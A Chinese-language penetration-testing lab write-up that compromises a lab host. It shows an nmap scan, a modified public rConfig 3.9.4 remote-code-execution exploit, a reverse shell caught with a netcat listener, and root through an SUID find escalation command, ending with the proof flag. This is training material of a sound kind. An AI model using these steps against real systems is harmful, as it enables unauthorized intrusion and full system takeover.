主要知识点

• 端口转发

具体步骤

执行nmap扫描,开了好多端口，我先试验80和8081，看起来8081比较有趣

Nmap scan report for 192.168.51.57
Host is up (0.0011s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.2
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.49.51
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
22/tcp   open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 a2:ec:75:8d:86:9b:a3:0b:d3:b6:2f:64:04:f9:fd:25 (RSA)
|   256 b6:d2:fd:bb:08:9a:35:02:7b:33:e3:72:5d:dc:64:82 (ECDSA)
|_  256 08:95:d6:60:52:17:3d:03:e4:7d:90:fd:b2:ed:44:86 (ED25519)
80/tcp   open  http        Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
|_http-title: Apache HTTP Server Test Page powered by CentOS
| http-methods: 
|_  Potentially risky methods: TRACE
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp  open  netbios-ssn Samba smbd 4.10.4 (workgroup: SAMBA)
3306/tcp open  mysql       MariaDB (unauthorized)
8081/tcp open  http        Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
|_http-title: 400 Bad Request

访问8081端口，发现rConfig 3.9.4正在运行

搜索一下exploit得到了 rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution - PHP webapps Exploit 需要修改一下exp,在发送request的时候加入 verify=False参数，否则会报自签名证书错误，不过还是会失败在下面这一步，不过至少创建出了admin用户，把exp最后的删除admin user的代码去掉，保留admin权限

[+] Adding a temporary admin user...
[+] Authenticating as pxaovedjzi...
[+] Logged in successfully, triggering the payload...
[+] Check your listener !
[-] The command was not executed by the target or you forgot to open a listener...
[+] Removing the temporary admin user...
[+] Done.

继续搜索信息，得到了https://gist.github.com/farid007/9f6ad063645d5b1550298c8b9ae953ff 

看来同样具有admin+file upload漏洞，得到reverse shell

C:\home\kali\Documents\OFFSEC\GoToWork\Quackerjack> nc -nlvp 80  
listening on [any] 80 ...
connect to [192.168.45.189] from (UNKNOWN) [192.168.162.57] 47790
Linux quackerjack 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux11:04:35 up 13 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.2$
sh-4.2$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)

继续寻找信息，发现 /usr/bin/find命令有 SUID权限，直接利用，得到root权限

bash-4.2$ find / -type f -perm -4000 2>/dev/null
find / -type f -perm -4000 2>/dev/null
/usr/bin/find
......
......
/usr/libexec/dbus-1/dbus-daemon-launch-helper
bash-4.2$ /usr/bin/find . -exec /bin/sh -p \; -quit
/usr/bin/find . -exec /bin/sh -p \; -quit
sh-4.2# id
id
uid=48(apache) gid=48(apache) euid=0(root) groups=48(apache)
sh-4.2# cat /root/proof.txt
cat /root/proof.txt
307a236503d332668cdf2eb1fd38c2f1